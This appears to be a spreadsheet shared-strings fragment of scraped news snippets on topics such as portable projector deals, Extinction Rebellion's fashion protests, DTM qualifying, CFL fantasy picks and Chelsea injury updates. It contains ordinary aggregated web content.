    <t>Source: http://feedproxy.google.com/~r/ziffdavis/extremetech/~3/2TtXCi-NxvY/300071-save-big-on-these-portable-projectors-and-take-movie-night-anywhere Save Big On These Portable Projectors And Take Movie Night Anywhere Between cable cutting and streaming services, people are changing how they watch their favorite shows and movies. But while it’s one thing to binge Netflix in your living room, it’s another to take all your favorite media with you wherever you go. Portable projectors make it easy to set up and watch, stream, present, or play absolutely anywhere. Whether you make a lot of presentations for your job or you’re a movie buff with a creative side, you’ll love having a portable projector, and we’ve rounded up some of the best deals available right now. PIQO Powerful 1080p Mini Projector This pocket-sized HD projector can project images up to an enormous 240″, making it ideal for an outdoor movie night. It’s WiFi and Bluetooth-enabled so you can stream media from any device with minimal setup. Get it now for 64% off $799 at just $279.99. UO Smart Beam Laser HD Projector with Accessory Set This tiny two-inch cube can project up to 150″ in crystal clear HD video quality. It takes no time at all to warm up or cool down and comes with a tripod, holder, and pouch to make it easy to carry and set up at any time. Get it now for 24% off $474.99 at $359. CINEMOOD Portable Movie Projector This 3-inch projector is the easiest, most convenient way to bring your entertainment anywhere. It’s extremely easy to stream Netflix and YouTube content, and it even works as a standalone device. That means you can download content for offline viewing and it comes pre-loaded with more than 120 hours of additional entertainment as well as 45 Disney ebooks and 20 videos. Get it now for 12% off $399 at $349. AAXA S1 Mini Projector for Nintendo Switch Nintendo Switch gamer? You probably enjoy it more on the TV but what if you could get that TV experience anywhere else? With this projector, you can. Set it up quickly and easily and project your intense Mario Kart races or Smash battles anywhere. Get it now for 7 percent off $312.99 at $289. Prima 1080p HD Pocket Projector This 200-lumen projector is roughly the size of an iPhone 7s Plus and can turn any moment into a multimedia extravaganza. Sports, movies, games, you name it, this projector can handle it. It also comes with an Android-powered operating system, allowing you to access the Google Play Store, download apps, and stream directly from apps. Get it now for 62 percent off $799 at just $299.99. Laser Beam Pro C200 Focus Free HD Portable Projector A 2017 CES Innovation Awards Honoree, this pocket-sized projector lets you enjoy 780p HD resolution video anywhere. It comes with 8GB of internal memory so you can download movies or shows directly to the device to save time or you can connect to phones, TVs, consoles, VR devices, drones, GoPros, and more via the integrated ports. Get it now for 18 percent off $489.90 at $399. Source: http://feedproxy.google.com/~r/ziffdavis/extremetech/~3/2TtXCi-NxvY/300071-save-big-on-these-portable-projectors-and-take-movie-night-anywhere The post Save Big On These Portable Projectors And Take Movie Night Anywhere appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>SUPERCARS may look stunning as they flash past the high street, but have you ever thought about turning that dream into a reality? Daily Express :: Cars Feed</t>
  </si>
  <si>
    <t>A judge overturns the convictions of a bus driver who crashed into the Montague Street Bridge in South Melbourne, injuring six people. But Jack Aston will remain in prison while he is assessed for a community corrections order for lesser charges.</t>
  </si>
  <si>
    <t>POKEMON Go developer Niantic is teasing a big new storyline for the game. Daily Express :: Entertainment Feed</t>
  </si>
  <si>
    <t>Marvel Stadium is the centre of the action as clubs start eight days of wheeling and dealing.</t>
  </si>
  <si>
    <t>Marie Yovanovitch told lawmakers that Donald Trump himself had pressured the State Department to oust her from her position.</t>
  </si>
  <si>
    <t>LONDON — Last month, on the final day of London Fashion Week, hundreds of black-clad demonstrators gathered in Trafalgar Square to embark on what they called “a funeral march for fashion.” Gathering behind a band and giant painted coffin, they slowly processed en masse down the Strand, shutting down traffic on the busy thoroughfare as they chanted and handed out leaflets, leaving gridlock and chaos in their wake. It was just the latest in a series of efforts designed by Extinction Rebellion, or XR, to disrupt the most visible British fashion event of the year. First, protesters covered in fake blood performed a die-in and demanded fashion week be canceled on opening day. Then, outside the Victoria Beckham show, activists had lined up, brandishing posters emblazoned with statements like “R.I.P. LFW 1983-2019” and “Fashion = Ecocide.” Sustainability is at the forefront of the fashion conversation today in a way it has never been before, and the emergence of XR — which 18 months ago consisted of just 10 people in Britain and has since swelled to millions of followers across 72 countries — has stoked the increasingly heated discussion. Although the movement targets numerous industries and governments worldwide, a recent focus on fashion has been particularly high profile. Extinction Rebellion, which held demonstrations outside the Manhattan headquarters of The New York Times earlier this year demanding the newspaper increase its focus on climate change, has a distinctive hourglass logo, viral social media campaigns and creatively packaged demands for drastic action. It calls itself the fastest-growing climate and ecology direct action movement in history. Come Monday, the most ambitious protest effort by the group yet will get underway, with tens of thousands of protesters planning to bring roads around Westminster to gridlock; there will also be a sit-in at London City Airport. This is the beginning of two weeks of environmental demonstrations that will also include repair stations where people can bring their old or damaged clothes. So how does it all work? Extinction Rebellion, which originally grew out of the activist group Rising Up! and relies solely on crowdfunding, has three key goals: that governments are transparent about the impact of climate change; that they reduce net greenhouse gas emissions to zero by 2025; and that governments worldwide create citizens’ assemblies to set climate priorities. The group has been deliberately conceived as a self-organizing, non-hierarchical holacracy. There is no single leader or group steering its strategy, tactics and goals. Instead, it is a loose alliance of 150 groups across Britain alone, with volunteers organized into working subgroups, and support teams and responsibilities distributed among chapters. Meetings and planning sessions tend to take place in online forums and on messaging apps, with meetings offline used for training and creating a sense of community. Extinction Rebellion is not the first modern protest movement to organize in such a way (there are parallels in particular with the Occupy movement), though the setup can foster a general sense of confusion and disarray. Volunteers cheerfully describe planning meetings as “pretty crazy and disorganized.” A news conference last week ahead of the latest mass protests involved a fair amount of shouting and technical difficulties, and at London Fashion Week, certain planned protests failed to materialize. With the exception of the funeral march, turnouts were generally lower than anticipated. Indeed, the success, and confusion, around the XR approach to fashion — a sector responsible for about 10 percent of all greenhouse gas emissions, according to the United Nations — is fairly representative of the state of the group at large. “It’s always somewhat chaotic and messy, but I suppose that’s part of the beauty of Extinction Rebellion,” said Sara Arnold, a coordinator of Boycott Fashion, an XR subgroup that has made headlines by urging people to buy no new clothes for a year. “You learn to just run with it and hope for the best.” Ms. Arnold, 32, studied fashion design at Central St Martins before environmental concerns led to a decision not to design or produce new clothes. She founded the clothes rental company Higher Rental, and though she refuses to be classified as a leader — “there are no leaders at XR,” she said — she has been one of the more visible and vocal figureheads in the group’s efforts to hold the fashion industry to account. For her, a key reason fashion has become a target for XR activists is because it shapes people’s aspirations. “This is not about the survival of the fashion industry, this is about the survival of the planet,” Ms. Arnold said, peering through her trademark oversize glasses. “We are now in a state of emergency. Stopping people consuming is really the only way of having any impact at this point, which is a difficult message for many people to take on board. The changes we are seeing from some brands remain extremely superficial.” Ms. Arnold continued. Unsurprisingly, XR’s mission and messaging are not popular among many conventional fashion brands and retailers. But the group has also been spurned by another, more surprising, industry faction: sustainable brands. Another coordinator, Bel Jacobs, a former fashion editor of the free daily newspaper Metro, said that she and other Extinction Rebellion members had found themselves the target of ire from those who said the campaigning was damaging to a new wave of businesses attempting to improve the ethical and environmental footprint of clothes. “By asking for huge sacrifices, we know we are alienating ourselves but we are also shifting the Overton window and empowering people, both in and outside the industry,” Ms. Jacobs said. “As a communication tool, fashion is so influential. We all have to put clothes on and that has power.” There is some dispute even inside XR about whether it is better to work with the fashion industry or against it. Last summer, for example, three members of Extinction Rebellion appeared in an advertising campaign for the luxury fashion designer Stella McCartney, roaming the Welsh coastline in expensive new designer clothing, without letting other chapters know. The Boycott Fashion coordinators said the first they heard of the partnership was when they saw the photographs. They were, Ms. Jacobs put delicately, somewhat surprised. However, at the London news conference last week, Douglas Rogers, an XR spokesman, insisted that the absence of a solid hierarchy is what gives the movement its strength. Fresh efforts were underway to further decentralize its organizing systems from a London rebellion support office to autonomous regional bases, as British police announced this week that they would seek new legal powers against protesters. More than 1,100 people were arrested at Extinction Rebellion’s protests in April, in a police operation that cost £16 million, or $19.7 million. About 850 protesters have been prosecuted and 250 convicted. “Of course it can be challenging to maintain a communal sense of control, but without visible leadership it makes us stronger in the face of those who would want to break the movement down,” Mr. Rogers said, amid a scrum of reporters and activists and vocal pleas that chairs get stacked to make more space in the room. “I actually find moments like the Stella McCartney campaign reassuring because it shows this really is a rebellion,” he said. “Rebellions are messy and overlap and are forged from lots of opinions and actions. It would be very worrying if XR acted like some superslick Silicon Valley-style business. Not that there is much chance of anyone actually thinking that.” Source link</t>
  </si>
  <si>
    <t>We review products independently, but we may earn affiliate commissions from buying links on this page. Terms of use. Google’s new Pixel Buds are the company’s second attempt at creating a “hearable,” and its first venture into true wireless earbuds. Google says its hardware is a gateway into its services—and it wants you to be able to access Google Assistant anytime, anywhere. So a pair of earbuds that can always hear you say, “Hey Google!” fit the bill. The Buds don’t come out until next year, so we didn’t get to test their performance, but we got to take a look at their industrial design and talk to some experts about how they’ll work. READ NEXT: Best UK Google Pixel 4 Pre-Order Deals for October 2019 Source link</t>
  </si>
  <si>
    <t>Carsluith Castle is a ruined tower house which lies beside the A 75 a few miles south-east of Creetown in Dumfries and Galloway. Its car park also doubles as one for the cafe/restaurant which occupies what was once its courtyard:- “Battlements”:-</t>
  </si>
  <si>
    <t>Chloe Hewitt</t>
  </si>
  <si>
    <t>Mike Rockenfeller was the quickest driver in a DTM Series qualifying for the first time since August 2015 but the German will not start from pole for the final race of the year at Hockenheim. A five place grid penalty for accumulating three black and white flags throughout the season means that Nico Müller will start from pole. Timo Glock who has had a poor season by his own admissions will start alongside Müller. Extremely wet conditions met the drivers when they got the session underway, with Müller coming out on top in the early stages. The lap times however were rapidly changing as the drivers hunted for the best of the grip in the torrential conditions, with the drivers constantly running wide as they hunted for the limit. Unlike a typical session where the field would return to pits, the drivers stayed on track the whole session to make the most of the conditions and maximise an opportunity that came with the rapidly changing positions. For a few minutes the times stabilised with none of the drivers pushing for a quick lap with the clock quickly ticking down. There was some improvements in the late stages with Marco Wittmann improving to sixth and Nick Cassidy moving to sixteenth and the best placed of the SuperGT drivers. As Müller improved on his benchmark time out-front it looked like the Swiss driver had done enough to claim the three points for pole position, however on his final lap – and the final lap of the session – Rockenfeller stole pole by 0.013 of a second. However, his third black and white flag of the year in the race yesterday for forcing Wittmann off the track has proved costly as the German will have to take a five place penalty – demoting him to sixth. The session ended with Rockenfeller fastest from Müller and Glock. After Rockenfeller’s penalty Jamie Green will line up third with Joel Eriksson in fourth. Wittmann will be fifth with Rockenfeller slotting into sixth. Philipp Eng is seventh with 2019 DTM Champion René Rast only eighth. Robin Frijns and Loïc Duval complete the top ten. Jake Dennis is the best placed R-Motorsport Aston Martin driver in eleventh with team-mate Ferdinand Habsburg in twelfth. Jonathan Aberdein will start thirteenth alongside Bruno Spengler. Behind them will be Sheldon van der Linde, and Cassidy. Paul di Resta who ran off the track at the Sachskurve in the latter parts of the session starts with team-mate Dani Juncadella alongside. Jenson Button, Pietro Fittipaldi and Ronnie Quintarelli complete the grid. The final DTM race of 2019 gets underway at 13.30 local time. 2019 DTM Series: Hockenheim II – Qualifying Two POS DRIVER NAT TEAM TIME 1 Mike Rockenfeller DEU Audi 1:50.800 2 Nico Müller SUI Audi +0.013 3 Timo Glock DEU BMW +0.460 4 Jamie Green GBR Audi +0.591 5 Joel Eriksson SWE BMW +0.689 6 Marco Wittmann DEU BMW +0.988 7 Philipp Eng AUT BMW +1.007 8 René Rast DEU Audi +1.073 9 Robin Frijns NED Audi +1.190 10 Loïc Duval FRA Audi +1.194 11 Jake Dennis GBR Aston Martin +1.442 12 Ferndinand Habsburg AUT Aston Martin +1.574 13 Jonathan Aberdein RSA Audi +1.683 14 Bruno Spengler CAN BMW +1.691 15 Sheldon van der Linde RSA BMW +1.711 16 Nick Cassidy NZL Lexus +1.727 17 Paul di Resta GBR Aston Martin +1.734 18 Dani Juncadella ESP Aston Martin +1.852 19 Jenson Button GBR Honda +1.987 20 Pietro Fittipaldi BRA Audi +2.610 21 Ronnie Quintarelli ITA Nissan +3.075</t>
  </si>
  <si>
    <t>TRANQUILLITY is the first word that springs to mind when considering this peaceful and private 10ha property on Hobart’s Eastern Shore.</t>
  </si>
  <si>
    <t>Philip G. Pavely-USA TODAY Sports The Pittsburgh Steelers are 1-4, and while fan confidence remains low, a win heading into the bye could be a cure for what ails the fan base. The Pittsburgh Steelers are in a bad place right now, and their fans might be in a worse place. Fans of the black-and-gold aren’t used to enduring seasons which begin with a 1-4 record, yet here we are. After their 26-23 overtime loss to the Baltimore Ravens, the SB Nation FanPulse of the Steelers shows a trend which isn’t heading in the right direction, but why should it? The Steelers have yet to prove not only they can defeat a quality opponent, but also to prove they are able to make the plays necessary to beat anyone who has a win on their overall record. The latest FanPulse results certainly paint a pretty accurate photo of how fans truly feel: After the Steelers beat the Bengals in Week 4, the FanPulse data showed the confidence percentage go from 28% to 31%. After the gut-wrenching loss to Baltimore the confidence marks dipped back to 28%. Not a huge dip in confidence, but this is the current state of the Steelers. Dealing with such a poor start to the season definitely changes how fans view the team and the upcoming stretch of games. With that said, a win over a team like the Los Angeles Chargers in Week 6, a place the Steelers have struggled under Mike Tomlin, before the bye week could certainly boost these numbers. If, and that is a huge if, they can beat the Chargers and defeat the Miami Dolphins on Monday Night Football in Week 8, the then 3-4 Steelers would have some momentum and fan confidence should improve tremendously. But is all starts with beating the Chargers on Sunday Night Football. Buckle up fans, this game Sunday game will be a big one! Do you want to be a part of the BTSC Steelers FanPulse? It is easy to sign up for, and takes mere minutes a week. Simply click HERE and fill out the appropriate information!</t>
  </si>
  <si>
    <t>The Sun's outbursts can disrupt technology on Earth, and Europe needs better protection. The post Europe eyes improved ‘space weather’ resilience appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>Week 19 of TSN CFL Fantasy Football Presented by Leo Vegas means it’s time for Fantasy users to get creative. With only three weeks left in the regular season, those competing for league titles have no reason to prepare an end zone celebration. The Fantasy user who awakens on Sunday morning will be the one who knew who to start and who to sit. That Fantasy user read the following and heeded the words wisely. RELATED » Play TSN CFL Fantasy presented by LeoVegas » DailyRoto: Week 18 Fantasy Rankings » Make your picks with Total CFL Pick ‘Em Toronto at Montreal Friday | 7:00 p.m. ET Line: Montreal (-10) O/U: 53 Start: Quan Bray, WR, Alouettes, $5,383 Salary Bray has quietly become a dependable Fantasy receiver, having produced at least 10.2 Fantasy points via his pass-catching in six of his last seven games, including a 20.9 effort in last week’s loss to the Blue Bombers. He’s put up at least 73 yards in three of his last five, with games of 99 and 91 in that span. Considering the Argos allow 7.1 yards per play, don’t be shocked if Bray gets a touch on a run or two. Bray has had success against the Argos, having caught five passes for 91 yards and a score in the Week 11 win. If the league’s two worst defences in yards per play allowed live up to expectations, Bray will put up mammoth numbers. Sit: DeVier Posey, WR, Alouettes, $6,213 Salary The rise of Bray has come at a cost of Posey, especially in the past three games where Posey managed just seven receptions for only 71 yards. The presence of rookie Jake Wieneke ($4,127) and the return of running back William Stanback ($7,397) further nudges out Posey, who has just two touchdowns this season. Eugene Lewis ($7,896) will get the majority of targets from pivot Vernon Adams Jr. ($10,928), who will seek to rebound from last week’s four-interception fiasco against Winnipeg. That’s a lot of targets in front of Posey. Saskatchewan at BC Friday | 10:00 p.m. ET Line: PK O/U: 47 Start: Roughriders Defence, $5,786 Salary New Lions starting pivot Danny O’Brien ($5,000) passed for only 103 yards after replacing the injured Mike Reilly in last week’s loss at the Eskimos. The road is tougher this week, as O’Brien must face a Saskatchewan defence that has recorded 11 sacks, five interceptions and two forced fumbles in their last three games. The Riders are second in yardage allowed per game and yards per play, making the choice of any Lions a risky proposition. Sit: All Lions receivers not named Bryan Burnham O’Brien should be better than his 103 passing yards, but there’s no reason to roll the dice in hopes that he will. Even Burnham ($10,942) is a considerable risk, as he did have only two catches for 29 yards last week. This could shape up to be a game where the Lions lean heavily on running back John White ($7,960), who is just 78 yards away from 1,000 yards. Ottawa at Hamilton Saturday | 4:00 p.m. ET Line: Hamilton (-17) O/U: 51 Start: Dane Evans, QB, Tiger-Cats, $8,448 Salary He’s found his stride. Over the past five games, Evans has averaged 354.8 passing yards along with tossing 12 touchdown passes and adding another on the ground. It’s hard to envision the REDBLACKS — who have lost eight straight — being able to slow down Evans, who tossed for 300 yards and a score against Ottawa in Week 10. Only the Argonauts have allowed more touchdowns than the REDBLACKS have allowed, and if Evans gets into an early groove, the 46 majors given up by Ottawa will increase sharply.(CFL Sit: Tyrell Sutton, RB, Tiger-Cats, $6,226 Salary Two reasons why Sutton is here. 1) Evans has a monster afternoon passing afternoon and makes the Hamilton running game a non-factor. Or 2) the Ticats return to a committee approach to its ground game, meaning that Sutton will see limited touches. It’s hard to be down on a back who ran for 88 yards on 11 carries against the Eskimos two weeks ago, but we have seen the Tiger-Cats throw Fantasy users a curve more than once this season. Winnipeg at Calgary Saturday | 7:00 p.m. ET Line: Calgary (-7) O/U: 50.5 Start: Hergy Mayala, WR, Stampeders, $3,315 Salary Last week’s two-touchdown performance felt like a breakout game for Mayala, who has seen his role increased over the past three weeks with 13 receptions and 222 yards, The Blue Bombers will have their hands full with Reggie Begelton ($11,274) and Eric Rogers ($7,981), whose recent play has opened the door for Bo Levi Mitchell ($9,549) to get Mayala, the team’s first pick in this year’s draft, more involved in a Calgary passing game that needs to find is explosive side. The Stamps have completed a league-low 15 passes of better than 30 yards. Sit: Darvin Adams, WR, Blue Bombers, $6,154 Salary Save for his 109-yard outing against the Roughriders in Week 17, Adams’ return from the Injured List has produced few highlights. With the inconsistent play of pivot Chris Streveler ($9,335), Adams and the rest of the Blue Bombers receiving corps have become a grab bag that has seen various pass-catchers lead the team every week. Adams is still capable of making a big play, but they have been few and far in between.</t>
  </si>
  <si>
    <t>HALFORDS research has shown a staggering number of cars are being driven illegally across Britain’s roads in a big risk for motorists. Daily Express :: Cars Feed</t>
  </si>
  <si>
    <t>Welcome to LocalAdz, your total internet marketing solutions specialist. We focus on Premium WordPress Web Design, Mobile Website Development and are Internet Search Engine Management authorities. Anything you want to be recognized for on the Web, we can make you a VISIBLE professional in your geographic area. Shop in Avon MN. We use cutting edge methods for your keywords that are PROVEN and EFFECTIVE at increasing YOUR position in the search engines! We are a complete custom Premium Website Design, SEM Avon and Internet Marketing firm. We can meet all of your Custom Web Design and Search Engine Management needs. We are experienced Web designers and search engine managers using the latest technology and online marketing techniques. We use the latest Web standards to meet your goals and expectations. We create websites and mobile websites that function across all browsers and mobile devices and load in the blink of an eye. Affordable Custom Website Design in Avon MN | Mobile Website Design We utilize W3C compliant, search engine friendly code in all of our projects. We bring a user-centric philosophy and process to each and every decision, with our experience in usability and design. In short we do more than just design websites that are “pretty”. We design websites that help convert visitors into clients! We want to make Internet Marketing an accessible and successful addition to any marketing plan. We are a leading Internet Marketing and Search Engine Management Avon MN Specialists. We can help drive more unique visitors to your website and convert them to buyers. We have been designing Websites and providing SEM since 2009; there have been MANY changes over these last few years. As technology has improved so has the web. It is more important than ever to keep up with the industry standards and what Google expects to see in web design. Because the best website on the planet will do you no good if people cannot find it. Good SEM and quality Web Design go hand in hand if you truly want to dominate your competition. Let LocalAdz help. We are not only one of the best SEM Companies in Avon, we also offer top notch web design and development. Whether you need just a simple informational HTML website, or a custom built database, or anything in between we got it covered. Shop for Web Designer in Avon MN. More Avon MN Information Avon Minnesota Weather Nearby Locations Web Developers in Pebble Beach CA Web Designer in Slatyfork WV Web Design Services in Vaughan NC Web Design Portfolio in Glen Oaks NY Originally Posted on June 30, 2013 and reposted on December 10, 2016"&gt;Website Design Company in Pennsylvania Furnace PAOriginally Posted on June 30, 2013 and reposted on December 10, 2016 Website Design Company in Frenchburg KY Website Builders in Amberson PA Web Design Company in Otsego MN Website Designer in Elma WA Web Developers in Bay City TX Avon Minnesota Map Republished by Blog Post Promoter The post Web Designer in Avon MNOriginally Posted on June 19, 2010 and reposted on October 2, 2019 appeared first on Free Consultation (702) 518-6567.</t>
  </si>
  <si>
    <t>Our thinking on reserved spaces for vehicle-sharing schemes needs a radical shake-up, or Sydney motorists will be driven mad.</t>
  </si>
  <si>
    <t>Ruchira Sharma</t>
  </si>
  <si>
    <t>Public Health Wales said 28 cases of mumps been recorded at universities in Wales, in Cardiff and the Cwm Taf Area</t>
  </si>
  <si>
    <t>A South Australian business says it's been forced to lay off workers because of almost $200,000 in unpaid bills, amid the collapse of several building companies based in South Australia in the past 12 months.</t>
  </si>
  <si>
    <t>A tractor-trailer overturned onto a passing SUV on Interstate 4 in Florida late on October 18 as storms prompted tornado warnings in several areas, including parts of Polk County. Westbound lanes of the interstate were closed for a number of hours This was one of two such incidents. A second tractor-trailer overturned near Lakeland, Florida, according to local reports. As strong winds swept the state, authorities also reported downed power lines and damage to mobile homes in nearby Pinellas County, according to local media. This video shows police and emergency services responding at the scene of an overturned truck. Tornado watches remained in place for west-central and southwest Florida, the National Weather Service reported on October 19. Credit: Wesley Grimes via Storyful</t>
  </si>
  <si>
    <t>Blair Dingwall</t>
  </si>
  <si>
    <t>Police have warned motorists as they help transport an "abnormal load" down the busiest road between Dundee and Aberdeen.</t>
  </si>
  <si>
    <t>Sean Longstaff and Andy Carroll have delivered two brutal assessments of Sunday’s 5-0 defeat at Leicester, with one calling the performance “f*****g embarrassing” – Full story here. According to the Daily Mail’s Craig Hope, several players were concerned by Steve Bruce’s decision to change formation once again before Saturday’s trip to Leicester City – Full story here. Source</t>
  </si>
  <si>
    <t>Newcastle United head coach Steve Bruce has revealed what goalscorer Matty Longstaff said to him after the Magpies’ victory over Manchester United on Sunday. The 19-year-old was handed a first Premier League start by the Toon boss, and rewarded the head coach’s faith by smashing home the game’s only goal. Now, Bruce has recalled the first thing the teenager said to him afterwards. Source</t>
  </si>
  <si>
    <t>Robin Gill</t>
  </si>
  <si>
    <t>Robin Gill sat down with the documentary filmmaker in Vancouver to talk politics and the filmmaker’s election predictions on both sides of the border.</t>
  </si>
  <si>
    <t>noise36</t>
  </si>
  <si>
    <t>I have no doubt better deals probably coming in the next couple of months but I was glad to get the kids sorted for xmass now. Comes down to about $350 delivered using the discounted ebay gift cards, so better deal for those like myself who were waiting for an ebay switch deal. Those without gift cards might prefer easier warranty at JB/HN etc. Original Coupon Deal</t>
  </si>
  <si>
    <t>Enjoy this wonderful Chill out music mix 2017 for Relaxation, Spa, Sleeping, study and Relaxing you mind. Just concentrate and imagine… JJOS feat. LENNA ROSS Volveré JJOS More Than I Know (Ambient Mix) ALEXANDER KING CHILLOUT Relaxing Pianos JOSE RAMOS Diferent Heaven JORGE TAMARIT Inside Secret JJOS Crockett’s Theme (Ambient Relax Mix) JJOS Feel The […] The post Relaxing Ambient Chillout Music mix Summer 2017 | Wonderful Relaxation Chill out music Playlist appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>Scott Morrison himself would not need reminding that the 2001-2010 millennium drought contributed to John Howard’s undoing, given he was perceived – rightly or wrongly – to be indifferent to climate change.</t>
  </si>
  <si>
    <t>MICROSOFT has taken the wraps off its new Surface Pro X hybrid computer during its scheduled hardware event in New York City. Here’s everything you need to know about the Surface Pro X including specs, price and release date. Daily Express :: Tech Feed</t>
  </si>
  <si>
    <t>James Maloney says he has no regrets walking away from the NRL after a stellar career.</t>
  </si>
  <si>
    <t>Coronation Street the Tour will make a spooktacular transformation as it prepares to welcome...</t>
  </si>
  <si>
    <t>Health Minister Greg Hunt has promised to slash red tape in the process for approving new drugs to be subsidised through the Pharmaceutical Benefits Scheme, after the head of the powerful medicines lobby complained that Australians were waiting too long for life-saving medicines.</t>
  </si>
  <si>
    <t>Hugh Godwin</t>
  </si>
  <si>
    <t>World Rugby are considering contingency plans for Sunday game but i understands it will not be switched to Monday as Scotland hope The post Typhoon Hagibis: Scotland vs Japan could be played behind closed doors appeared first on 24plusnews.co.uk.</t>
  </si>
  <si>
    <t>POKEMON fans can tune in to 24 hour Sword and Shield footage live from Glimwood Tangle. Watch the live stream here with Express Online. Daily Express :: Entertainment Feed</t>
  </si>
  <si>
    <t>English Georgian Hangman game – select either to guess the English or the Georgian word from the head word in the other language. The word to guess is represented by a row of dashes, giving the number of letters. View the history of words used in the game and click on the list to show … Continue reading English Georgian Hangman →</t>
  </si>
  <si>
    <t>James, Kovacic, Kante, Christensen – Latest Chelsea injury news ahead of Newcastle clash Original Source Premier League football is nearing a return following the second international break of the season, and Chelsea will be looking to continue where they left off. The Blues recorded a 4-1 win over Southampton in their last game before the break, and Frank Lampard’s side host Newcastle United upon the return to action this weekend. Steve Bruce’s side have not had too much to shout about so far this season, but have recorded shock 1-0 wins over both Tottenham and, most recently Manchester United, meaning that the Blues will have to be wary going into the match. Read More The international break has also not been too kind to the Chelsea boss, with fitness concerns now hanging over a few players, so who will be fit for the match vs the Magpies? Here’s the latest injury news and recovery dates from Cobham. N’Golo Kante In what was worrying news for Chelsea, midfielder Kante was withdrawn from the French team to face Iceland on Friday night after originally being named in the starting lineup. Following the match, France boss Didier Deschamps provided an injury update on the player. “He felt a pain in the adductor [groin] muscle,” Deschamps said. “He had a feeling where he did not feel comfortable to play. N’Golo Kante during a training session at the Chelsea Training Ground (Image: Darren Walsh/Chelsea FC via Getty Images) “I made the decision [to pull him from the squad], because maybe it could get even worse. “I do not think it’s too serious for NG [Kante], but I do not have an answer tonight.” With that said, the good news is that the World Cup winner was in training on Sunday, however was doing a work-out away from the main group, and is unlikely to feature against Turkey. Read More Andreas Christensen In what would be another major blow to Chelsea and Frank Lampard, defender Andreas Christensen looked as though he may have also picked up an injury while on international duty. The 23-year-old was spotted holding his groin as he limped off during Denmark’s 1-0 win over Switzerland on Saturday evening. The extent of the problem is yet to be revealed, but the concern is that the defender will be unavailable for the Premier League visit of Newcastle after the international break. Read More Emerson Palmieri The Italian picked up an injury while on international duty earlier in the month, he did make his return against Liverpool, but lasted just 15 minutes before having to be substituted. Speaking ahead of the meeting with Brighton on last week, Lampard confirmed that the defender could make his return after the international break, “Emerson is going to be the other side of the international break with the hamstring injury,” said the Chelsea boss. Video Loading Video Unavailable Click to play Tap to play The video will start in 8Cancel Play now Antonio Rudiger The German made his first appearance of the season against Wolves a few weeks ago, but had to be replaced at half-time. Rudiger has not been included in the squad since with Lampard revealing that no date has been set for his return. “Toni has got a recurring injury in the groin,” he said. “So it’s not the knee. Antonio Rudiger returned to the first team on SAturday (Photo by Clive Howes – Chelsea FC/Chelsea FC via Getty Images) “We are trying to find a solution because he still does have some pain. We are hopeful that it won’t be long, but we don’t have an end date for you.” Read More Ruben Loftus-Cheek Loftus-Cheek was establishing himself as a key member of Maurizio Sarri’s squad at the end of last season. However, in the post-season friendly ahead of the Europa League final, Loftus-Cheek suffered the same fate as Hudson-Odoi and ruptured his Achilles’ tendon. The midfielder is still undergoing rehabilitation and it is still going to be some time before Loftus-Cheek is back to full fitness, with Premier Injuries suggesting that a November return could be on the cards. Ruben Loftus-Cheek receives medical treatment. (Image: Darren Walsh/Chelsea FC via Getty Images) In a boost to Chelsea, Lampard has confirmed that the midfielder is stepping up his recovery by training outside. “Ruben we can’t give a date but he is outside jogging slowly,” he said ahead of the Brighton game last week. “That is a positive move for this week, good to see him outside and we will see how that goes over the next weeks.” The player has also been talking about his road to recovery. Video Loading Video Unavailable Click to play Tap to play The video will start in 8Cancel Play now “I’ve actually had a few setbacks that have put me behind which has been quite frustrating to be honest,” he told WOWHYDRATE. “I’ve had to learn to walk again and I’ve only just got pain free but for sure I’m going to come back stronger, sharper and do whatever I can to be in better shape. “Everything I’ve been working towards is for the feeling of stepping back onto that pitch again and I’m ready to go.” Full story here. Stay up to date with all the latest with all the latest Chelsea news from Oliver Harbord and the team at football.london across our social media channels. Twitter: You can follow our dedicated Chelsea Twitter account, and our Chelsea correspondent Oliver Harbord. Facebook: You can follow our Chelsea page here. Instagram: Follow our Chelsea page here. WhatsApp: Click here to enroll or text NEWS to 07557204594 and then add the number to your phone contacts book as chelsea dot london (case sensitive, with spaces) to receive daily updates and breaking news from Oliver Harbord and the team on Chelsea. Your phone number won’t be shared with any other members of the group. Click here for more information on the service. Marco van Ginkel The midfielder is a long term absentee, having suffered an Anterior Cruciate ligament injury. The Dutchman is on the way to recovery, having posted a video of himself working on the anti-gravity treadmill at the club’s training ground. Although there is no return date provided for the 26-year-old. Read More Mateo Kovacic Chelsea have suffered yet another injury scare. Mateo Kovacic was substituted during Croatia’s clash with Wales on Sunday evening. The Croatian midfielder picked up a knock in the build-up to Gareth Bale’s equaliser for Wales at the end of the first half, with Kovacic being replaced by Ivan Rakitic. Mateo Kovacic in action for Croatia against Wales (Image: Sanjin Strukic Pixsell/MB Media/Getty Images) The extent of the injury is not yet known, and the Blues will now be waiting for news on the 25-year-old, who has made 11 appearances for Chelsea in all competitions so far this season. Reece James The 19-year-old has only just made his return from a long term injury, but there is now another injury concern over the young full-back. James was withdrawn from the England U21 squad at the start of the international break, with what is thought to be an ankle injury. According to Premier Injuries, the teenager is rated with a 50% chance of being available for the match against Newcastle.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James, Kovacic, Kante, Christensen – Latest Chelsea injury news ahead of Newcastle clash appeared first on Premier League. Follow us on our social networks Posted on Bible Of Sport Bible Of Sport - Instagram Bible Of Sport - Twitter Bible Of Sport - Facebook Source link</t>
  </si>
  <si>
